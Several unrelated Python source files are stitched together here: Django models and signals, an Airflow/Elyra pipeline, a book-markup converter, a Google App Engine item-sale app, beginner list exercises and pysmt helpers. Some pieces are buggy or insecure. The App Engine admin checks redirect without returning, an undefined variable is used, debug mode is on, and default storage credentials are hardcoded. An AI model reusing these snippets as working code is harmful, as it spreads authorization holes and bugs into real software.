create_date = models.DateTimeField('Date', auto_now=True)
type = models.CharField('Type', choices=TYPES, max_length=1)
model = models.CharField('Class', max_length=200)
log = models.CharField('Log', max_length=250)
def __unicode__(self):
return "%s: %s" % (self.create_date.strftime("%d.%m.%Y %H:%M"), self.log)
@receiver(pre_save, sender=Student)
@receiver(pre_save, sender=Group)
def model_save_signal(sender, instance, signal, *args, **kwargs):
h = Logger()
h.model = str(sender)
try:
sender.objects.get(pk=instance.pk)
h.type = 'M'
h.log = 'modified'
except sender.DoesNotExist:
h.type = 'C'
h.log = 'created'
h.log = 'Object <%s> ' % instance + h.log
h.save()
@receiver(post_delete, sender=Student)
@receiver(post_delete, sender=Group)
def model_delete_signal(sender, instance, signal, *args, **kwargs):
h = Logger()
h.model = str(sender)
h.type = 'D'
h.log = 'Object <%s> was deleted' % instance
h.save()
|
from airflow import DAG
from airflow.contrib.operators.kubernetes_pod_operator import KubernetesPodOperator
from airflow.utils.dates import days_ago
args = {
"project_id": "etl-1012105319",
}
dag = DAG(
"etl-1012105319",
default_args=args,
schedule_interval="@once",
start_date=days_ago(1),
description="Created with Elyra 3.1.1 pipeline editor using `etl.pipeline`.",
is_paused_upon_creation=False,
)
op_a8cc213a_6708_48c2_812b_046d1246bc9b = KubernetesPodOperator(
name="input",
namespace="airflow",
image="continuumio/anaconda3:2020.07",
cmds=["sh", "-c"],
arguments=[
"mkdir -p ./jupyter-work-dir/ && cd ./jupyter-work-dir/ && curl -H 'Cache-Control: no-cache' -L https://raw.githubusercontent.com/elyra-ai/elyra/v3.1.1/elyra/airflow/bootstrapper.py --output bootstrapper.py && curl -H 'Cache-Control: no-cache' -L https://raw.githubusercontent.com/elyra-ai/elyra/v3.1.1/etc/generic/requirements-elyra.txt --output requirements-elyra.txt && python3 -m pip install packaging && python3 -m pip freeze > requirements-current.txt && python3 bootstrapper.py --cos-endpoint http://myminio.server:9000 --cos-bucket store --cos-directory 'etl-1012105319' --cos-dependencies-archive 'input-data-a8cc213a-6708-48c2-812b-046d1246bc9b.tar.gz' --file 'input/input-data.ipynb' "
],
task_id="input",
env_vars={
"ELYRA_RUNTIME_ENV": "airflow",
"AWS_ACCESS_KEY_ID": "minioadmin",
"AWS_SECRET_ACCESS_KEY": "minioadmin",
"ELYRA_ENABLE_PIPELINE_INFO": "True",
"ELYRA_RUN_NAME": "etl-1012105319-{{ ts_nodash }}",
},
in_cluster=True,
config_file="None",
dag=dag,
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import getopt
import os.path
import re
import sys
class Formatter():
@staticmethod
def format(str):
# Handle {_xxx_} for italics.
m = re.match(r'^(.*)\{_(.+?)_\}(.*)$', str)
if m:
pre = m.group(1)
content = m.group(2)
post = m.group(3)
str = Formatter.format(pre)
str += '<i>' + Formatter.format(content) + '</i>'
str += Formatter.format(post)
# Convert 3 or more dashes into a long dash.
m = re.match(r'^(?P<pre>.*[^-])?(?P<dashes>[-]{3,})(?P<post>[^-].*)?$', str)
if m:
pre = m.group('pre')
dashes = m.group('dashes')
post = m.group('post')
str = ''
if pre:
str += Formatter.format(pre)
str += '<span class="longdash">' + ('–' * len(dashes)) + '</span>'
if post:
str += Formatter.format(post)
# Handle {/} for line break.
str = str.replace("{/}", "<br/>")
# Force non-breaking spaces around some punctuation.
str = str.replace("« ", "« ")
str = str.replace(" »", " »")
return str
# Tables are structured as follows:
# ++-----+-----+-----+ <-- start of table
# +| x1 | x2 | x3a | <-- start of row 1 'x'
# | | | x3b |
# +| y1 | y2 | y3 | <-- start of row 2 'y'
# ++-----+-----+-----+ <-- end of table
#
# New rows start with '+|'.
# Continuation rows start with ' |'.
# Cells are separated by '|' (except for start/end table, which use '+')
# Cell data can span multiple rows.
class TableParser():
"""Parser for table in BookMu."""
def __init__(self, parser):
self.parent = parser
self.reset()
def reset(self):
self.data = []
self.num_cols = 0
self.formatting = []
self.reset_row()
def reset_row(self):
self.curr_row = ['' for i in range(0, self.num_cols)]
self.valid_row = False
def start_table(self, line):
cols = line[2:-1].split('+')
self.num_cols = len(cols)
self.reset_row()
def end_table(self):
self.add_row_to_table()
def add_row_to_table(self):
if not self.valid_row:
return
self.data.append(self.curr_row)
self.reset_row()
def add_line_to_row(self, line):
data = line[2:-1].split('|')
if len(data) != self.num_cols:
self.parent.error('Incorrect num of columns in table row')
for i in range(0, self.num_cols):
self.curr_row[i] += Formatter.format(data[i])
self.valid_row = True
# Alignment info:
# Horizontal alignment is typically inferred from the position of
# the text in the cell, but it can be explicitly specified using
# an alignment line:
# @|H V|
#
# H = horizontal alignment:
# '<' (left), ':' (center), '.' (split), '>' (right), ' ' (infer)
# V = vertical alignment:
# '^' (top), '-' (center), 'v' (bottom)
#
# By default, H = ' ' and V = '^'
#
# The 'split' horizontal alignment requires that a split point be specified
# with ':':
# @|. : v|
# +| 20 |
# +| 1370 |
# +| 0.5 |
# Everything up to and including the split point will be right-aligned
# and everything after the split point will be left aligned.
def record_alignment_info(self, line):
# Ignore alignment info for now.
pass
# Return True when the last line of the table is read.
def process_line(self, line):
m = re.match(r'^\+\+[-+]+\+', line)
if m:
self.end_table()
return True
if '\t' in line:
self.parent.error('Tab characters are not allowed in tables')
prefix = line[0:2]
if prefix == '+|':
self.add_row_to_table()
self.add_line_to_row(line)
elif prefix == ' |':
self.add_line_to_row(line)
elif prefix == '@|':
self.record_alignment_info(line)
else:
self.parent.error('Unrecognized table line')
return False
def generate_html(self):
html = '<table class="dataTable">'
for row in self.data:
html += '<tr>'
for col in row:
html += '<td>%s</td>' % re.sub(r'[ \t]+', ' ', col).strip()
html += '</tr>'
html += '</table>'
return html
class Parser():
"""Build script for parsing BookMu texts."""
def __init__(self):
self.page_num = None
self.add_page_num = False
self.line_num = None
self.curr_line = None
self.section_id = 0
self.paragraph_id = 0
self.reset_paragraph()
self.note_id = 0
self.reset_note()
# Dictionary with count of all words found in doc.
self.dict = {}
self.table = TableParser(self)
self.in_table = False
def error(self, msg):
if self.line_num and self.curr_line:
print 'Error (line %d): %s' % (self.line_num, msg)
print 'Line: %s' % self.curr_line
else:
print 'Error: %s' % (msg)
sys.exit(1)
def reset_paragraph(self):
self.in_paragraph = False
self.paragraph = []
def reset_note(self):
self.in_note = False
self.note = []
def write_paragraph(self):
text = ' '.join([x.strip() for x in self.paragraph])
text = Formatter.format(text)
if '{' in text or '}' in text:
self.error("Unhandled { brace }: " + text)
self.paragraph_id += 1
id = self.paragraph_id
self.outfile.write('<p id="b%d"><a class="plink" href="#b%d"></a>' % (id, id))
self.outfile.write(text + '</p>\n')
self.reset_paragraph()
def write_note(self):
self.note_id += 1
note = '<label for="n%d" class="note-label"></label>' % self.note_id
note += '<input type="checkbox" id="n%d" class="note-checkbox"/>' % self.note_id
note += '<span class="note">'
note += ' '.join([x.strip() for x in self.note])
note += '</span>'
self.paragraph.append(note)
self.reset_note()
def write_table(self):
self.outfile.write(self.table.generate_html())
self.outfile.write('\n')
def record_page_num(self, page_num):
if self.page_num != None or self.add_page_num:
self.error('Unprocessed page number: %s' % self.page_num)
self.page_num = page_num
self.add_page_num = True
def calc_page_num_link(self):
if not self.add_page_num:
self.error('Attempting to add undefined page num')
p = int(self.page_num)
# Reset page num when we calc the link.
self.page_num = None
self.add_page_num = False
return '<span class="pagenum" id="pg%d"><a href="#pg%d">[p.%d]</a></span>' % (p, p, p)
# Process an entire line from the file.
def process_line(self, line):
self.line_num += 1
self.curr_line = line
line = line.rstrip()
# Process comments.
m = re.match(r'^--', line)
if m:
# Page number.
# Note that page numbers can occur in the middle of a paragraph.
m = re.match(r'^--page (\d+)\s*$', line)
if m:
self.record_page_num(m.group(1))
return
m = re.match(r'^---$', line)
if m:
if self.in_paragraph:
self.error('Horizontal rule lines may only occur between paragraphs: %s' % line)
self.outfile.write('<hr/>\n')
return
# All other '--' comments are ignored.
return
if self.in_table:
done = self.table.process_line(line)
if done:
self.write_table()
self.in_table = False
return
# A figure in the text.
# Figures are added to the current paragraph. If there is no current paragraph,
# a new one is started.
m = re.match(r'^{figure (large) "(.+)" "(.+)"}\s*$', line)
if m:
size = m.group(1)
caption = m.group(2)
filename = m.group(3)
if self.add_page_num:
self.paragraph.append(self.calc_page_num_link())
figure = '<span class="figure"><a href="img/%s.jpg"><img class="block-image-%s" src="img/%s.png"/></a><br/><span class="caption">%s</span></span>' % (filename, size, filename, caption)
self.paragraph.append(figure)
self.in_paragraph = True
return
# ----------------
# Frontmatter tags
# ----------------
# These should only occur in the frontmatter section at the start of the document.
m = re.match(r'^{title (x-small|small|medium|large) "(.+)"}\s*$', line)
if m:
size = m.group(1)
title = m.group(2)
self.outfile.write('<div class="title frontmatter-%s"/>%s</div>\n' % (size, title))
return
m = re.match(r'^{frontmatter (x-small|small|medium|large) "(.+)"}\s*$', line)
if m:
size = m.group(1)
title = m.group(2)
self.outfile.write('<div class="frontmatter frontmatter-%s"/>%s</div>\n' % (size, title))
return
# ---------------
# Footnote markup
# ---------------
# These should only occur within a paragraph.
# Footnotes/endnotes.
# Must be indented with tab.
if len(line) != 0 and line[0] == '\t':
mNote = re.match(r'^\t\{\^(.+)\^\}$', line)
if mNote:
self.note.append(mNote.group(1))
self.write_note()
return
else:
mNoteStart = re.match(r'^\t\{\^(.+)$', line)
if mNoteStart:
self.note.append(mNoteStart.group(1))
self.in_note = True
return
mNoteEnd = re.match(r'^\t(.+)\^\}$', line)
if mNoteEnd:
self.note.append(mNoteEnd.group(1))
self.write_note()
return
if self.in_note:
self.note.append(line)
return;
self.error("Unexpected tab-indent line: " + line)
# --------------
# Top-level tags
# --------------
# These should only occur outside a paragraph.
# Section heading.
m = re.match(r'^{section "(.+)"}\s*$', line)
if m:
section_name = m.group(1)
if self.in_paragraph:
self.error('Section tags may only occur between paragraphs: %s' % line)
self.section_id += 1
self.outfile.write('<h1 id="s%d">' % (self.section_id))
if self.add_page_num:
self.outfile.write(self.calc_page_num_link())
self.outfile.write('%s</h1>\n' % (section_name))
return
# An unnumbered image in the text.
m = re.match(r'^{image (small) "(.+)"}\s*$', line)
if m:
size = m.group(1)
filename = m.group(2)
if self.in_paragraph:
self.error('Image tags may only occur between paragraphs: %s' % line)
self.outfile.write('<a href="img/%s.jpg"><img src="img/%s.png" class="block-image-%s"/></a>\n' % (filename, filename, size))
return
# ------------
# Table markup
# ------------
m = re.match(r'^\+\+[-+]+\+', line)
if m:
# Start new table
self.in_table = True
self.table.reset()
self.table.start_table(line)
return
# ------------------
# Paragraph handling
# ------------------
# Fall-through case to handle basic paragraph text.
line = line.lstrip()
if line == '':
if self.in_paragraph:
self.write_paragraph()
return
if self.add_page_num:
self.paragraph.append(self.calc_page_num_link())
self.paragraph.append(line)
self.in_paragraph = True;
def write_html_header(self, title):
self.outfile.write('<!DOCTYPE html>\n')
self.outfile.write('<html lang="en">\n')
self.outfile.write('<head>\n')
self.outfile.write('\t<meta charset="utf-8" />\n')
self.outfile.write('\t<meta http-equiv="X-UA-Compatible" content="IE=edge" />\n')
self.outfile.write('\t<meta name="viewport" content="width=device-width, initial-scale=1" />\n')
self.outfile.write('\t<title>%s</title>\n' % title)
self.outfile.write('\t<link href="https://fonts.googleapis.com/css?family=Old+Standard+TT:400,400italic,700" rel="stylesheet" type="text/css" />\n')
self.outfile.write('\t<link href="book.css" rel="stylesheet" type="text/css" />\n')
self.outfile.write('</head>\n')
self.outfile.write('<body>\n')
self.outfile.write('<div class="container">\n')
def write_html_footer(self):
self.outfile.write('</div>\n')
self.outfile.write('</body>\n')
self.outfile.write('</html>\n')
def process(self, src, dst):
if not os.path.isfile(src):
self.error('File "%s" doesn\'t exist' % src)
try:
infile = open(src, 'r')
except IOError as e:
self.error('Unable to open "%s" for reading: %s' % (src, e))
try:
outfile = open(dst, 'w')
except IOError as e:
self.error('Unable to open "%s" for writing: %s' % (dst, e))
self.outfile = outfile
self.write_html_header('City of Carcassonne')
self.line_num = 0
for line in infile:
self.process_line(line)
self.write_html_footer()
outfile.close()
infile.close()
def add_to_dict(self, word, line):
# Print entire line for word.
# Useful for tracking down short typo words.
#if word == 'hom':
# print self.id, line
if not word in self.dict:
self.dict[word] = 0
self.dict[word] += 1
def write_dict(self):
dst = 'dict.txt'
try:
outfile = open(dst, 'w')
except IOError as e:
self.error('Unable to open "%s" for writing: %s' % (dst, e))
for word in sorted(self.dict, key=self.dict.get, reverse=True):
outfile.write('%d %s\n' % (self.dict[word], word))
outfile.close()
def usage():
print 'Usage: %s <options>' % sys.argv[0]
print 'where <options> are:'
print ' --config <config-file-name>'
print ' --dict' # write word frequency dict
print ' --verbose' # verbose debug output
def load_config(file):
config = {}
try:
config_file = open(file, 'r')
except IOError as e:
print('Error - Unable to open config file "%s": %s' % (file, e))
sys.exit(1)
for line in config_file:
line = line.strip()
if line == '' or line[0] == '#':
continue
(k,v) = line.split('=')
if v == 'True':
config[k] = True
elif v == 'False':
config[k] = False
elif ',' in v:
config[k] = v.split(',')
else:
config[k] = v
config_file.close()
return config
def main():
try:
opts, args = getopt.getopt(sys.argv[1:],
'dv',
['dict', 'verbose'])
except getopt.GetoptError:
usage()
exit()
write_dict = False
verbose = False
for opt, arg in opts:
if opt in ('-d', '--dict'):
write_dict = True
elif opt in ('-v', '--verbose'):
verbose = True
# The raw input file (with the Plotto text).
infilename = 'texts/city-of-carcassonne/cityofcarcassonn00viol.txt'
outfilename = 'texts/city-of-carcassonne/out.html'
print 'Building', outfilename, '...'
parser = Parser()
parser.process(infilename, outfilename)
if write_dict:
parser.write_dict()
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# Python libraries
import os
import cgi
import urllib
import json
# Google App Engine api
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext import blobstore
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.api import mail
# Web libraries
import webapp2
import jinja2
JINJA_ENVIRONMENT = jinja2.Environment(
loader = jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions = ['jinja2.ext.autoescape']
)
class Item(ndb.Model):
name = ndb.StringProperty(required=True)
item_type = ndb.StringProperty(required=True, choices=['Book', 'Electronic Product', 'Stationery', 'Other'])
description = ndb.StringProperty(indexed=False)
origin_price = ndb.IntegerProperty(required=True)
start_price = ndb.IntegerProperty(required=True)
current_price = ndb.IntegerProperty(required=True)
buyer_num = ndb.IntegerProperty(default=0)
current_buyer = ndb.StringProperty(required=True)
picture = ndb.StringProperty(indexed=False)
confirmed = ndb.BooleanProperty(default=False)
class MainHandler(webapp2.RequestHandler):
def get(self):
# # admin
# if not users.is_current_user_admin():
# self.redirect('/sorry')
# user
user = users.get_current_user()
if user:
user_url = users.create_logout_url(self.request.uri)
user_url_linktext = 'Logout'
# admin
isAdmin = users.is_current_user_admin()
# items
items = Item.query(Item.confirmed == False).order(-Item.buyer_num).fetch(100)
my_confirmed_items = Item.query(ndb.AND(
Item.confirmed == True,
Item.current_buyer == user.email()
)).fetch(100)
my_items = []
my_total_price = 0
# stat
stat = {
'item_num': len(items),
'item_sold': 0,
'item_total_buyer': 0
}
for item in items:
if item.current_buyer == user.email():
item.is_mine = True
my_items.append(item)
my_total_price += item.current_price
item.is_hot = bool(item.buyer_num >= 5)
item.is_free = bool(item.current_price == 0)
if item.current_buyer:
stat['item_sold'] += 1
stat['item_total_buyer'] += item.buyer_num
if not stat['item_num']:
stat['item_ratio'] = 0
else:
stat['item_ratio'] = float(stat['item_sold']) / float(stat['item_num']) * 100
template_values = {
'stat': stat,
'items': items,
'my_confirmed_items': my_confirmed_items,
'has_items': bool(len(my_items) + len(my_confirmed_items)),
'my_items': my_items,
'my_total_price': my_total_price,
'user': user,
'user_url': user_url,
'user_url_linktext': user_url_linktext,
'isAdmin': isAdmin
}
else:
user_url = users.create_login_url(self.request.uri)
user_url_linktext = 'Login'
# admin
isAdmin = users.is_current_user_admin()
# items
items = Item.query().fetch(100)
# stat
stat = {
'item_num': len(items),
'item_sold': 0,
'item_total_buyer': 0
}
for item in items:
if item.current_buyer:
stat['item_sold'] += 1
stat['item_total_buyer'] += item.buyer_num
if not stat['item_num']:
stat['item_ratio'] = 0
else:
stat['item_ratio'] = float(stat['item_sold']) / float(stat['item_num']) * 100
template_values = {
'stat': stat,
'user': user,
'user_url': user_url,
'user_url_linktext': user_url_linktext,
'isAdmin': isAdmin
}
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.write(template.render(template_values))
class SorryHandler(webapp2.RequestHandler):
def get(self):
# admin
self.response.write('Sorry, under development. -- Ming');
self.response.write('<a href="' + users.create_login_url(self.request.uri) + '">LOGIN</a>');
class ConfirmHandler(webapp2.RequestHandler):
def get(self):
# user
user = users.get_current_user()
if not user:
self.redirect('/')
else:
items = Item.query(ndb.AND(
Item.confirmed == False,
Item.current_buyer == user.email())).fetch(100)
if not len(items):
self.redirect('/')
else:
for item in items:
item.confirmed = True
item.put()
s = '''
Dear %s,
Thank you for using my website.
You need to pay the following amount of money: $ %s.
Please reply this email ASAP (arranging pick up time)!!!
Best regards,
Ming
''' % (user.nickname(), sum([item.current_price for item in items]))
s.encode(encoding='UTF-8',errors='strict')
mail.send_mail(
sender='Ming YIN <ym.kalasoo@gmail.com>',
to=user.email(),
subject='sellmystuffym Notification',
body=s
)
self.redirect('/')
class AddConfirmHandler(webapp2.RequestHandler):
def get(self):
# admin
if not users.is_current_user_admin():
self.redirect('/')
# items
items = Item.query().order(-Item.buyer_num).fetch(100)
for item in items:
item.confirmed = False
item.put()
self.redirect('/')
class SendMailHandler(webapp2.RequestHandler):
def get(self):
# admin
if not users.is_current_user_admin():
self.redirect('/')
# items
items = Item.query(Item.confirmed == False).fetch(100)
emails = list(set([ item.current_buyer for item in items ]))
template_values = {
'emails': emails
}
template = JINJA_ENVIRONMENT.get_template('sendmail.html')
self.response.write(template.render(template_values))
def post(self):
# admin
if not users.is_current_user_admin():
self.redirect('/')
# items
items = Item.query(Item.confirmed == False).fetch(100)
emails = list(set([ item.current_buyer for item in items ]))
subject = self.request.get('email_title') or 'sellmystuffym Notification'
content = self.request.get('email_content')
if not content:
self.redirect('/send_mail')
else:
for email in emails:
if not email:
continue
s = '''
Dear %s,
''' % email + content + '''
Best regards,
Ming
'''
print s
mail.send_mail(
sender='Ming YIN <ym.kalasoo@gmail.com>',
to=email,
subject=subject,
body=s
)
self.redirect('/send_mail')
class ImageHandler(webapp2.RequestHandler):
def get(self):
item = ndb.get(self.request.get('img_id'))
if item.picture:
self.response.out.write(greeting.picture)
class AddItemHandler(webapp2.RequestHandler):
def get(self):
# admin
if not users.is_current_user_admin():
self.redirect('/')
template_values = {
}
template = JINJA_ENVIRONMENT.get_template('addItem.html')
self.response.write(template.render(template_values))
def post(self):
# admin
if not users.is_current_user_admin():
self.redirect('/')
# new item instance
item = self.gen_Item()
if not item:
self.redirect('/add_item')
else:
item.put()
self.redirect('/')
self.response.write(item)
def gen_Item(self):
req = self.request
name = req.get('item_name')
item_type = req.get('item_type')
description = req.get('item_desc')
origin_price = req.get('origin_price')
start_price = req.get('start_price')
current_price = start_price
buyer_num = 0
current_buyer = ""
picture = req.get('picture')
# check
if not all([name, item_type, origin_price, start_price]):
return None
else:
origin_price = int(origin_price)
start_price = int(start_price)
current_price = int(current_price)
print picture
item = Item(
name=name,
item_type=item_type,
description=description,
origin_price=origin_price,
start_price=start_price,
current_price=current_price,
buyer_num=buyer_num,
current_buyer=current_buyer,
picture=picture
)
return item
class WantBuyHandler(webapp2.RequestHandler):
def post(self):
res = {
'done': False,
'current_price': 0
}
# user
user = users.get_current_user()
if not user:
res['error'] = 'user'
self.response.write(json.dumps(res))
return
# item
item = Item.get_by_id(int(self.request.get('item_id')))
if not item:
res['error'] = 'item'
self.response.write(json.dumps(res))
return
if item.start_price:
if user.email() != item.current_buyer:
item.current_buyer = user.email()
item.current_price += 1
item.buyer_num += 1
else:
if not item.current_buyer:
item.current_buyer = user.email()
item.buyer_num += 1
elif user.email() != item.current_buyer:
res['error'] = 'free'
self.response.write(json.dumps(res))
return
res['current_price'] = item.current_price
item.put()
res['done'] = True
# return
self.response.write(json.dumps(res))
app = webapp2.WSGIApplication([
('/', MainHandler),
('/sorry', SorryHandler),
('/confirm', ConfirmHandler),
('/add_confirm', AddConfirmHandler),
('/send_mail', SendMailHandler),
('/img', ImageHandler),
('/add_item', AddItemHandler),
('/want_buy', WantBuyHandler)
], debug=True)
|
# Execercise form w3resources
# Link => https://www.w3resource.com/python-exercises/list/
from random import randint
lists = []
for i in range(1, 15):
num = randint(1, 100)
lists.append(num)
# 1. Write a Python program to sum all the items in a list
print(lists)
print("Sum of list is " + str(sum(lists)))
# 2. Write a Python program to multiplies all the items in a list.
newlist = []
count = 0
for i in lists:
newlist.append(i * 2)
count += 1
print(f'{count}' + str(newlist))
# 3. Write a Python program to get the largest number from a list.
print("Max num is " + str(max(lists)))
# 4. Write a Python program to get the smallest number from a list.
print("Min num is " + str(min(lists)))
# 5. Write a Python program to count the number of strings where the string length is 2 or more and the first and last character are same from a given list of strings.
string_list = ["tat", "ini", "door", "ad", "rand",
"rar", "mom", "1991", "2002", "2020", "dad", "4333"]
print("The current list is ")
print(string_list)
total = 0
for string in string_list:
if len(string) > 2 and string[0] == string[-1]:
total += 1
print(f"Total words found {total}")
# 6. Remove duplicates within a list!
for
|
import pytest
import unittest
from sqlparse.experiments import view_handler as v
sql='select v1.name as nom,V2.code,count(*) from view1 as v1, view2 as v2 where v1.code like "12345" group by nom;'
query=sqlparse.parse(sql)
class TestGeneratedView(unittest.TestCase):
view=v.GeneratedView({},{},{})
def test_root_exist(self):
assert (self.view.root_exists({},{})==False) |
from django.conf import settings
from django.db import models
from mongoengine import *
connect(settings.MONGODB_DATABASE)
class Profile(models.Model):
uuid = models.CharField(max_length=36, unique=True, blank = False, null = False, db_index = True)
def getDBName(self):
return "User_" + str(self.uuid).replace("-", "_")
def __unicode__(self):
return self.uuid
class ResourceKey(models.Model):
''' A way of controlling sharing within a collection. Maps to any key within a collection. For example, funf probes and individual answers to questions'''
key = models.CharField(max_length=120)
issharing = models.BooleanField(default=True)
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name = "resourcekey_owner")
class ProbeGroupSetting(models.Model):
''' A way of grouping resource keys for sharing.'''
name = models.CharField(max_length=120)
issharing = models.BooleanField(default=False)
keys = models.ManyToManyField(ResourceKey) #a list of roles the user is currently sharing with
class Purpose(models.Model):
name = models.CharField(max_length=120)
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="purpose_owner")
def __unicode__(self):
return self.name + "(" + self.datastore_owner.uuid + ")"
class Scope(models.Model):
name = models.CharField(max_length=120)
purpose = models.ManyToManyField(Purpose)
issharing = models.BooleanField(default=False)
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="scope_owner")
def __unicode__(self):
return self.name + "(" + self.datastore_owner.uuid + ")"
class Role(models.Model):
""" @name : The user defined name of the role
@purpose : A list of purposes associated with this role
@tokens : A list of oauth tokens of users assigned to this role """
name = models.CharField(max_length=120)
purpose = models.ManyToManyField(Purpose)
issharing = models.BooleanField(default=False)
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="role_owner")
def __unicode__(self):
return self.name + "(" + self.datastore_owner.uuid + ")"
# TODO: fill in field for tokens (rather than ints / uuids)
class SharingLevel(models.Model):
level = models.IntegerField()
purpose = models.ManyToManyField(Purpose)
isselected = models.BooleanField(default=False)
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="sharinglevel_owner")
def __unicode__(self):
return str(self.level) + "(" + self.datastore_owner.uuid + ")"
class AuditEntry(models.Model):
'''
Represents an audit of a request against the PDS
Given that there will be many entries (one for each request),
we are strictly limiting the size of data entered for each row
The assumption is that script names and symbolic user ids
will be under 64 characters
'''
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="auditentry_owner", db_index=True)
requester = models.ForeignKey(Profile, blank = False, null = False, related_name="auditentry_requester", db_index=True)
method = models.CharField(max_length=10)
scopes = models.CharField(max_length=1024) # actually storing csv of valid scopes
purpose = models.CharField(max_length=64, blank=True, null=True)
script = models.CharField(max_length=64)
token = models.CharField(max_length=64)
system_entity_toggle = models.BooleanField()
trustwrapper_result = models.CharField(max_length=64)
timestamp = models.DateTimeField(auto_now_add = True, db_index=True)
def __unicode__(self):
self.pk
class Notification(models.Model):
'''
Represents a notification about a user's data. This can be filled in while constructing answers
'''
datastore_owner = models.ForeignKey(Profile, blank = False, null = False, related_name="notification_owner")
title = models.CharField(max_length = 64, blank = False, null = False)
content = models.CharField(max_length = 1024, blank = False, null = False)
type = models.IntegerField(blank = False, null = False)
timestamp = models.DateTimeField(auto_now_add = True)
uri = models.URLField(blank = True, null = True)
def __unicode__(self):
self.pk
class Device(models.Model):
datastore_owner = models.ForeignKey(Profile, blank=False, null=False, related_name="device_owner", db_index=True)
gcm_reg_id = models.CharField(max_length=1024, blank=False, null=False)
|
from typing import Optional, Iterator, Iterable, FrozenSet, Tuple, List, Dict
import io
from math import ceil, log as mlog
from itertools import chain
from pysmt.environment import Environment as PysmtEnv
from pysmt.formula import FormulaManager
from pysmt.fnode import FNode
import pysmt.typing as types
from pysmt.shortcuts import And
from pysmt.smtlib.script import smtlibscript_from_formula
from pysmt.logics import QF_NRA
from smv_prefixes import NEXT_MONITOR_PREFIX
from rewritings import TimesDistributor
__VERBOSE = 0
def set_verbosity(val: int):
global __VERBOSE
assert isinstance(val, int)
__VERBOSE = val
def get_verbosity() -> int:
global __VERBOSE
return __VERBOSE
def log(msg: str, lvl: int = 5) -> None:
assert isinstance(msg, str)
if get_verbosity() >= lvl:
print(msg, flush=__debug__)
def pysmt_dump_whole_expr() -> None:
# workaround to print whole expressions.
FNode.__str__ = FNode.serialize
def to_smt2(env: PysmtEnv, *formulas, logic=QF_NRA) -> str:
assert isinstance(env, PysmtEnv)
script = smtlibscript_from_formula(env.formula_manager.And(*formulas),
logic=logic, env=env)
with io.StringIO() as buf:
script.serialize(buf, env=env)
return buf.getvalue()
def name_next(symb: str) -> str:
"""return smv monitor symbol for next assignment of input symb"""
assert isinstance(symb, str)
return f"{NEXT_MONITOR_PREFIX}{symb}"
def name_is_next(symb: str) -> bool:
"""True iff symb refers to next assignment"""
assert isinstance(symb, str)
return symb.startswith(NEXT_MONITOR_PREFIX)
def name_next_to_curr(symb: str) -> str:
"""return smv monitor symbol for current assignment of input symb"""
assert name_is_next(symb)
return symb[len(NEXT_MONITOR_PREFIX):]
def symb_is_next(symb: FNode) -> bool:
"""True iff symb refers to next assignment"""
assert isinstance(symb, FNode)
assert symb.is_symbol()
return symb.symbol_name().startswith(NEXT_MONITOR_PREFIX)
def symb_is_curr(symb: FNode) -> bool:
"""True iff symb does not refer to next assignment"""
return not symb_is_next(symb)
def symb_to_next(mgr: FormulaManager, s: FNode) -> FNode:
"""Get monitor for next(s)"""
assert isinstance(mgr, FormulaManager)
assert isinstance(s, FNode)
assert s.is_symbol()
assert s in mgr.get_all_symbols()
assert not name_is_next(s.symbol_name())
return mgr.Symbol(name_next(s.symbol_name()), s.symbol_type())
def to_next(mgr: FormulaManager, expr: FNode, symbols: Iterable) -> FNode:
"""Replace symbols with the corresponding monitor for next(symbol)"""
assert isinstance(mgr, FormulaManager)
assert isinstance(expr, FNode)
assert isinstance(symbols, Iterable)
assert all(s in mgr.get_all_symbols() for s in symbols)
return mgr.env.substituter.substitute(expr,
{s: symb_to_next(mgr, s)
for s in symbols})
def symb_to_curr(mgr: FormulaManager, x_s: FNode) -> FNode:
"""Get current assignment symbol"""
assert name_is_next(x_s.symbol_name())
return mgr.Symbol(name_next_to_curr(x_s.symbol_name()), x_s.symbol_type())
def to_curr(mgr: FormulaManager, expr: FNode, symbols: Iterable) -> FNode:
"""Replace next symbols with current symbols"""
assert isinstance(mgr, FormulaManager)
assert isinstance(expr, FNode)
assert isinstance(symbols, Iterable)
assert expr in mgr.formulae.values()
assert all(e in mgr.formulae.values() for e in mgr.env.ao.get_atoms(expr))
return mgr.env.substituter.substitute(expr,
{symb_to_next(mgr, s): s
for s in symbols})
def default_key(x: FNode) -> tuple:
assert isinstance(x, FNode)
return (x.is_constant(), x.node_type(), x.node_id())
def is_atom(p: FNode) -> bool:
"""Test whether the formula is an atomic boolean predicate
A literal is an atom, a theory relation is an atom.
A non-boolean constant is not an atom.
"""
assert isinstance(p, FNode)
return p.is_literal() or p.is_theory_relation() or \
p.is_bool_constant()
def is_not_true(p: FNode) -> bool:
assert isinstance(p, FNode)
return not p.is_true()
def not_rel(env: PysmtEnv, rel: FNode) -> FNode:
assert isinstance(env, PysmtEnv)
assert isinstance(rel, FNode)
assert rel in env.formula_manager.formulae.values()
mgr = env.formula_manager
if rel.is_true():
return mgr.FALSE()
if rel.is_false():
return mgr.TRUE()
assert rel.is_le() or rel.is_lt()
return mgr.GT(rel.arg(0), rel.arg(1)) if rel.is_le() else \
mgr.GE(rel.arg(0), rel.arg(1))
def assign2fnode(env: PysmtEnv, k: FNode, v: FNode) -> FNode:
assert isinstance(env, PysmtEnv)
assert isinstance(k, FNode)
assert isinstance(v, FNode)
assert k in env.formula_manager.formulae.values()
assert v in env.formula_manager.formulae.values()
assert env.stc.walk(k) == env.stc.walk(v)
mgr = env.formula_manager
tc = env.stc.walk
if not is_atom(k) or not tc(k).is_bool_type():
return mgr.Equals(k, v)
if v.is_true():
assert v is mgr.TRUE()
return k
if v.is_false():
assert v is mgr.FALSE()
return mgr.Not(k)
assert tc(k).is_bool_type()
assert tc(v).is_bool_type()
return mgr.Iff(k, v)
def assign2fnodes(env: PysmtEnv,
*assigns: Dict[FNode, FNode]) -> Iterator[FNode]:
assert isinstance(env, PysmtEnv)
assert all(isinstance(assign, dict) for assign in assigns)
